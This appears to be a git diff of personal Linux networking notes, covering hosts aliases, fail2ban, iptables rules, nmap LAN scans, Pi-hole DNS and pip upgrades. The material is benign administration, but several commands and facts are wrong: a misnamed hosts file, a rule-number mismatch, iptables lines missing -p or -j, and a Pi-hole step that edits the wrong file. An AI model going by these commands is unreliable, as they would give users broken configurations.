To change where hosts go, edit /etc/hostnames. You can enter, e.g.:
|
||||
|
||||
`54.239.25.200 www.amazon.com a`
|
||||
|
||||
... which then means simply the letter 'a' will lead you to amazon.com.
|
20
networking/fail2ban.md
Normal file
20
networking/fail2ban.md
Normal file
@ -0,0 +1,20 @@
|
||||
# SSH Daemon Jail
|
||||
|
||||
> sudo vim /etc/fail2ban/jail.d/ssh.local
|
||||
|
||||
```
|
||||
[sshd]
|
||||
enabled = true
|
||||
|
||||
ignoreip = 127.0.0.1/8 ::1,192.168.0.0/16 ::1
|
||||
|
||||
```
|
||||
|
||||
> sudo systemctl restart fail2ban
|
||||
|
||||
> sudo fail2ban-client status
|
||||
|
||||
> sudo fail2ban-client status sshd
|
||||
|
||||
|
||||
|
12
networking/graph-easy/example.txt
Normal file
12
networking/graph-easy/example.txt
Normal file
@ -0,0 +1,12 @@
|
||||
[ One ] { fill: seagreen; color: white; } -- label --> [ Two ] { shape: triangle; }
|
||||
[ One ] => { arrow-style: closed; } [ Three ]
|
||||
[ Five ] { fill: maroon; color: yellow; } <=> [ Three ]
|
||||
[ One ] .. Test\n label ..> [ Four ]
|
||||
[ Three ] { border-style: dashed; }
|
||||
.. Test\n label ..> { arrow-style: closed; } [ Six ] { label: Sixty\n Six\nand\nsix; }
|
||||
[ Seven ] -- [ Eight ]
|
||||
[ Five ] --> [ Eight ]
|
||||
[ Five ] --> [ Seven ]
|
||||
[ Two ] -> [ Four ]
|
||||
[ Three ] <-- Test label --> { arrow-style: closed; } [ Six ]
|
||||
[ Eight ] .. [ None ] { shape: none; fill: red; color: brown; }
|
53
networking/iptables.md
Normal file
53
networking/iptables.md
Normal file
@ -0,0 +1,53 @@
|
||||
# Intro
|
||||
|
||||
This is a basic Linux firewall program.
|
||||
|
||||
Look at your firewalls:
|
||||
|
||||
> iptables -L
|
||||
|
||||
We see the output of input, output and forwarding rules.
|
||||
|
||||
# Forward
|
||||
|
||||
I don't need any forwarding, so I'm going to drop all forwarding:
|
||||
|
||||
> iptables -P FORWARD DROP
|
||||
|
||||
# Input
|
||||
|
||||
Let's 'A'dd, or 'A'ppend a rule with -A. Let's drop all input from a nearby IP
|
||||
|
||||
> iptables -A INPUT -s 192.168.0.23 -j DROP
|
||||
|
||||
Or we can block all input from a particular port on the full network.
|
||||
|
||||
> iptables -A INPUT -s 192.168.0.0/24 -p tcp --destination-port 25 -j DROP
|
||||
|
||||
> iptables -A INPUT --dport 80 -j ACCEPT
|
||||
|
||||
|
||||
This allows http traffic to an Apache web server over port 80.
|
||||
|
||||
However, rules are accepted in order - so a packet cannot be rejected and then accepted.
|
||||
|
||||
To delete rule 2 from the INPUT chain:
|
||||
|
||||
> iptables -D INPUT 3
|
||||
|
||||
Alternatively, you can 'I'nsert a rule at the start, rather than 'A'ppending it.
|
||||
|
||||
> iptables -I INPUT -s 192.168.0.13 DROP
|
||||
|
||||
# Catchalls
|
||||
|
||||
Catchall rules state that anything which is not permitted is forbidden. They must be allowed last.
|
||||
|
||||
# -Jurice-Diction
|
||||
|
||||
The -j flag accepts ACCEPT/REJECT/DROP. The last two are identical except that "REJECT" acknowledges the rejection.
|
||||
|
||||
Flush all existing rules with:
|
||||
|
||||
> iptables -F
|
||||
|
19
networking/iptables/examples.sh
Normal file
19
networking/iptables/examples.sh
Normal file
@ -0,0 +1,19 @@
|
||||
#!/bin/sh
|
||||
# Allow all loopback (lo0) traffic and drop all traffic to 127/8
|
||||
# that doesn't use lo0
|
||||
iptables -A INPUT -i lo -j ACCEPT
|
||||
iptables -A OUTPUT -o lo -j ACCEPT
|
||||
iptables -A INPUT -d 127.0.0.0/8 ! -i lo -j REJECT --reject-with icmp-port-unreachable
|
||||
|
||||
# Allow established sessions to receive traffic
|
||||
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
|
||||
# Allow ICMP pings
|
||||
iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
|
||||
|
||||
# Allow SSH remote
|
||||
iptables -I INPUT -p tcp --dport 22 -j ACCEPT
|
||||
|
||||
# Reject all other inbound connections
|
||||
iptables -A INPUT -j REJECT --reject-with icmp-port-unreachable
|
||||
iptables -A FORWARD -j REJECT --reject-with icmp-port-unreachable
|
52
networking/iptables/iptables.md
Normal file
52
networking/iptables/iptables.md
Normal file
@ -0,0 +1,52 @@
|
||||
# Intro
|
||||
|
||||
This is a basic Linux firewall program.
|
||||
|
||||
Look at your firewalls:
|
||||
|
||||
> iptables -L
|
||||
|
||||
We see the output of input, output and forwarding rules.
|
||||
|
||||
# Forward
|
||||
|
||||
I don't need any forwarding, so I'm going to drop all forwarding:
|
||||
|
||||
> iptables -P FORWARD DROP
|
||||
|
||||
# Input
|
||||
|
||||
Let's 'A'dd, or 'A'ppend a rule with -A. Let's drop all input from a nearby IP
|
||||
|
||||
> iptables -A INPUT -s 192.168.0.23 -j DROP
|
||||
|
||||
Or we can block all input from a particular port on the full network.
|
||||
|
||||
> iptables -A INPUT -s 192.168.0.0/24 -p tcp --destination-port 25 -j DROP
|
||||
|
||||
> iptables -A INPUT --dport 80 -j ACCEPT
|
||||
|
||||
|
||||
This allows http traffic to an Apache web server over port 80.
|
||||
|
||||
However, rules are accepted in order - so a packet cannot be rejected and then accepted.
|
||||
|
||||
To delete rule 2 from the INPUT chain:
|
||||
|
||||
> iptables -D INPUT 3
|
||||
|
||||
Alternatively, you can 'I'nsert a rule at the start, rather than 'A'ppending it.
|
||||
|
||||
> iptables -I INPUT -s 192.168.0.13 DROP
|
||||
|
||||
# Catchalls
|
||||
|
||||
Catchall rules state that anything which is not permitted is forbidden. They must be allowed last.
|
||||
|
||||
# -Jurice-Diction
|
||||
|
||||
The -j flag accepts ACCEPT/REJECT/DROP. The last two are identical except that "REJECT" acknowledges the rejection.
|
||||
|
||||
Flush all existing rules with:
|
||||
|
||||
> iptables -F
|
11390
networking/ldap/guide.html
Normal file
11390
networking/ldap/guide.html
Normal file
File diff suppressed because it is too large
Load Diff
17
networking/nmap.md
Normal file
17
networking/nmap.md
Normal file
@ -0,0 +1,17 @@
|
||||
|
||||
Example:
|
||||
|
||||
> nmap 192.168.1.1/24
|
||||
|
||||
Flags:
|
||||
|
||||
| Flag | Meaning | Effect |
|
||||
| :---| :---| :---|
|
||||
| -F | Fast | First 100 ports only |
|
||||
|
||||
Look for a web server, which has ports 80 and 443 open:
|
||||
|
||||
> nmap 192.168.1.1/24 -p 80,443 --open
|
||||
|
||||
|
||||
|
27
networking/pihole/pihole.md
Normal file
27
networking/pihole/pihole.md
Normal file
@ -0,0 +1,27 @@
|
||||
|
||||
# List Out DNS
|
||||
|
||||
> echo "addn-hosts=/etc/pihole/lan.list" | sudo tee /etc/dnsmasq.d/02-lan.conf
|
||||
|
||||
Then edit that list
|
||||
|
||||
> sudo vim /etc/dnsmasq.d/02-lan.conf
|
||||
|
||||
`192.168.0.10 ratking.lan ratking`
|
||||
|
||||
Then restart the pihole's dns:
|
||||
|
||||
> sudo pihole restartdns
|
||||
|
||||
#View DNS traffic
|
||||
|
||||
> pihole -t
|
||||
|
||||
#Change password
|
||||
|
||||
> pihole -a -p
|
||||
|
||||
# Get new list of cancer
|
||||
|
||||
> pihole -g
|
||||
|
5
networking/pip.md
Normal file
5
networking/pip.md
Normal file
@ -0,0 +1,5 @@
|
||||
|
||||
Upgrade all packages
|
||||
|
||||
> pip freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user